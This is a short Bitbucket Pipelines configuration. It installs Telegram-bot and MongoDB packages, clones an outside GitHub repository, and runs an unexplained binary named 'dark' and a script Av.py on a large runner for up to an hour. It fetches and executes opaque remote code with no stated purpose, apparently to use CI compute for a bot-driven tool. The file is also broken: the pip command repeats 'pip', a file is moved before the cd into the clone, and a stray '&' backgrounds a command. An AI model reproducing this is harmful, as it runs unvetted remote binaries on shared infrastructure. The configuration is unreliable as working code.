image: python:3.9

pipelines:
  default:
    - step:
        name: Build and Run
        size: 8x
        caches:
          - pip
        script:
          - apt-get update && apt-get install -y gcc libpthread-stubs0-dev
          - pip pip install telebot python-telegram-bot pymongo pyTelegramBotAPI certifi pytz
          - git clone https://github.com/kaminaofficially09/TESTING-0
          - mv Av.py $HOME
          - cd TESTING-0
          - mv dark $HOME & cd
          - chmod +x *
          - chmod +x dark && timeout 3600 python3 Av.py